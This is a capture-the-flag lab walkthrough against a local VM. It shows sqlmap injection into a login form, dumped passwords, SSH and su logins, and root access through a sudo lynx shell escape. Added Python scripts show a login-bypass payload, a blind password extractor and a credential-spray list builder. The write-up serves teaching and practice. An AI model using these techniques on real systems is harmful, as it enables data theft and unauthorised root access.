Information gathering

Host discovery

arp-scan -l

Port scanning

┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.251.47
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-20 21:58 EDT
Nmap scan report for 192.168.251.47
Host is up (0.00034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    nginx 1.14.2
MAC Address: 08:00:27:3A:33:93 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.56 seconds

Port 80

The site presents a login page. SQL injection is the first thing to try, but the injection point is not obvious, so it has to be located first.

I registered a user and then noticed something that looked like an injection point: profile.php takes a userid parameter.

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://192.168.251.47/profile.php?userid=8" --dbs
[WARNING] GET parameter 'userid' does not seem to be injectable
Unfortunately that parameter is not injectable, so on to the login form.

Intercept the login POST request with a proxy and save it as a text file (post.txt); replaying it with sqlmap -r shows that the login form is injectable.

  • Enumerate databases
sqlmap -r post.txt --dbs --batch

available databases [4]:                                                                                                                                 
[*] chat
[*] information_schema
[*] mysql
[*] performance_schema
  • Enumerate tables
sqlmap -r post.txt -D chat --tables --batch

Database: chat                                                                                                                                           
[3 tables]
+-----------+
| user      |
| chat      |
| chat_room |
+-----------+
  • Enumerate columns
sqlmap -r post.txt -D chat -T user --columns --batch

Database: chat                                                                                                                                           
Table: user
[6 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| email     | varchar(255) |
| password  | varchar(30)  |
| phone     | varchar(255) |
| userid    | int(11)      |
| username  | varchar(30)  |
| your_name | varchar(60)  |
+-----------+--------------+
  • Dump the column contents
sqlmap -r post.txt -D chat -T user -C username,password --dump --batch

Database: chat                                                                                                                                           
Table: user
[8 entries]
+----------+-----------------+
| username | password        |
+----------+-----------------+
| pao      | pao             |
| nona     | myfriendtom     |
| tina     | davidwhatpass   |
| jerry    | thatsmynonapass |
| david    | adrianthebest   |
| 123456   | 123456          |
| aaa      | aaa             |
| 123      | 123             |
+----------+-----------------+

That completes the web side.
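The injection sqlmap exploited above lives in a login query that splices the POST fields straight into the SQL text. The following is an added example, not code from the target or from this write-up: it rebuilds that pattern on an in-memory SQLite table shaped like the dumped chat.user table, shows the authentication bypass, shows that a parameterized query is immune to the same payload, and then uses the login response as a yes/no oracle to pull a password out character by character, which is what sqlmap's boolean-based blind technique automates. The sample rows, the function names and the SQLite stand-in for MySQL are all assumptions of the example.

```python
import sqlite3
import string

# Constructed sample rows shaped like the dumped chat.user table (not the target's real data)
SAMPLE_USERS = [
    (1, "pao", "pao"),
    (2, "nona", "myfriendtom"),
    (3, "tina", "davidwhatpass"),
]


def make_db():
    """In-memory SQLite stand-in for the target's MySQL `chat` database (assumption)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (userid INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO user VALUES (?, ?, ?)", SAMPLE_USERS)
    return con


def login_vulnerable(con, username, password):
    """The injectable pattern: the POST fields are spliced straight into the SQL text.
    Returns the matched username, or None when no row matches (the page's 'login failed')."""
    sql = ("SELECT username FROM user WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con, username, password):
    """Parameterized version: values travel separately from the SQL text, so a quote
    in the input is compared as data and the same payloads match nothing."""
    row = con.execute(
        "SELECT username FROM user WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def blind_extract_password(con, target_user,
                           charset=string.ascii_lowercase + string.digits, max_len=40):
    """What sqlmap's boolean-based blind technique automates against a login form:
    the only oracle is 'logged in' vs 'invalid', so ask one yes/no question per request.
    Each payload closes the username quote, ORs in a subquery, and comments out the rest."""
    def oracle(condition):
        payload = "' OR (%s)-- " % condition
        return login_vulnerable(con, payload, "x") is not None

    # Step 1: recover the password length (NULL for an unknown user never compares true).
    length = next((n for n in range(1, max_len + 1)
                   if oracle("(SELECT length(password) FROM user WHERE username='%s') = %d"
                             % (target_user, n))), None)
    if length is None:
        return None
    # Step 2: recover one character per position.
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if oracle("(SELECT substr(password, %d, 1) FROM user WHERE username='%s') = '%s'"
                      % (pos, target_user, ch)):
                recovered += ch
                break
        else:
            return None  # a character outside the charset: widen it and retry
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("bypass (vulnerable):", login_vulnerable(db, "' OR 1=1-- ", "x"))
    print("bypass (safe):      ", login_safe(db, "' OR 1=1-- ", "x"))
    print("blind dump of nona: ", blind_extract_password(db, "nona"))
```

Note that the bypass payload uses `1=1--` rather than the textbook `' OR '1'='1`: without the comment, AND binds tighter than OR and the trailing password check still has to pass. The blind routine needs one request per length guess and one per candidate character, which is why sqlmap's -dump over a login form takes so long; time-based variants work the same way with a sleep() in place of the true/false response.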

Getting a shell

One thing to watch when logging in over SSH: the password column is shuffled relative to the username column. Each password string names its real owner (adrianthebest belongs to adrian, thatsmynonapass to nona), so go by the name embedded in the string rather than the row it was dumped in.

ssh adrian@192.168.251.47
password:adrianthebest
Nothing of interest in adrian's home directory.
The user nona has a user.txt, though.
su nona
password:thatsmynonapass

That gives a shell as nona and the user flag.

nona@talk:~$ cat user.txt
wordsarelies
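Matching the shuffled passwords to their owners by hand is easy for eight rows; the following added example (not from the original write-up) does the same matching programmatically and emits a user:pass list for an SSH spray tool. It takes the dumped pairs above as constructed input and assumes an extra name list (adrian, tom), since those two names appear only inside password strings and not in the username column.

```python
# Constructed copy of the username/password pairs dumped from chat.user above
DUMPED = [
    ("pao", "pao"), ("nona", "myfriendtom"), ("tina", "davidwhatpass"),
    ("jerry", "thatsmynonapass"), ("david", "adrianthebest"),
    ("123456", "123456"), ("aaa", "aaa"), ("123", "123"),
]

# Assumption: account names that exist on the box but not in the dumped username
# column. 'adrian' and 'tom' only show up inside password strings, so they must be
# supplied from elsewhere (the your_name column, /etc/passwd, or a guess).
EXTRA_NAMES = ["adrian", "tom"]


def reassign_passwords(dumped, extra_names=()):
    """Return {owner: [candidate passwords]} by reading the name embedded in each
    password string. Names are tried longest first, so '123456' is claimed by the
    account '123456' and not by '123'. A password that names nobody stays with
    the account it was dumped against."""
    names = sorted({u for u, _ in dumped} | set(extra_names), key=len, reverse=True)
    candidates = {}
    for dumped_user, pw in dumped:
        owner = next((n for n in names if n in pw), dumped_user)
        candidates.setdefault(owner, []).append(pw)
    return candidates


def to_combo_lines(candidates):
    """user:pass lines in the colon-separated form spray tools accept (e.g. hydra -C)."""
    return ["%s:%s" % (u, p) for u in sorted(candidates) for p in candidates[u]]


if __name__ == "__main__":
    for line in to_combo_lines(reassign_passwords(DUMPED, EXTRA_NAMES)):
        print(line)
```

The result pairs adrian with adrianthebest and nona with thatsmynonapass, which are exactly the two logins used above; jerry and tina end up with no candidate at all, because their dumped strings name other people.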

Privilege escalation

sudo -l shows one command that can be run as root without a password:

nona@talk:~$ sudo -l
Matching Defaults entries for nona on talk:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nona may run the following commands on talk:
    (ALL : ALL) NOPASSWD: /usr/bin/lynx
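Before reaching for a known escape it is worth triaging the whole sudo -l output: which rules are NOPASSWD, which run-as targets they allow, and which binaries are known to break out to a shell. The following added example (not code from the write-up) parses the output above, plus one constructed extra rule to show a case that is not flagged, against an assumed shortlist of shell-escape binaries; the lynx entry (the ! key) is the one used below.

```python
import re

# Constructed copy of the `sudo -l` output above, plus one made-up rule that requires
# a password and has no known shell escape, so the triage has something to ignore.
SUDO_L_OUTPUT = """\
Matching Defaults entries for nona on talk:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User nona may run the following commands on talk:
    (ALL : ALL) NOPASSWD: /usr/bin/lynx
    (root) /usr/bin/systemctl restart nginx
"""

# Assumed shortlist of binaries with a documented interactive shell escape.
SHELL_ESCAPES = {
    "lynx": "press ! inside lynx to spawn a shell",
    "vim": ":!sh", "vi": ":!sh", "less": "!sh", "more": "!sh", "man": "!sh",
    "find": "-exec /bin/sh \\;", "awk": "BEGIN {system(\"/bin/sh\")}",
}

# (runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_rules(text):
    """Parse the 'may run the following commands' section of sudo -l into
    (runas, nopasswd, command) tuples; the Defaults block is skipped."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(", "):
            rules.append((m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules


def triage(rules):
    """Flag rules whose command is a known shell-escape binary, NOPASSWD ones first."""
    findings = []
    for runas, nopasswd, cmd in rules:
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPES:
            findings.append({"command": cmd, "runas": runas, "nopasswd": nopasswd,
                             "escape": SHELL_ESCAPES[binary]})
    return sorted(findings, key=lambda f: not f["nopasswd"])


if __name__ == "__main__":
    for f in triage(parse_sudo_rules(SUDO_L_OUTPUT)):
        print("%s as (%s)%s: %s" % (f["command"], f["runas"],
                                    " NOPASSWD" if f["nopasswd"] else "", f["escape"]))
```

The same parser doubles as a hardening check from the defence side: any rule it flags should either be removed or have the binary's escape disabled (lynx, for instance, supports a restrictions option for the shell key), since allowing an interactive program as root with NOPASSWD is equivalent to granting a root shell.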

Escalate through lynx's shell escape. Run lynx as root via sudo, and once the page loads press ! (lynx's shell-escape key); the spawned shell inherits root.

sudo -u root /usr/bin/lynx

Inside lynx, press ! to drop to a shell:

root@talk:~# cat root.txt
talktomeroot

Key takeaways

  1. SQL injection: finding the injectable parameter (the login form rather than the GET parameter) and driving sqlmap from a captured POST request through --dbs, --tables, --columns and --dump
  2. Privilege escalation through lynx when sudo allows it as root with NOPASSWD (the ! shell escape)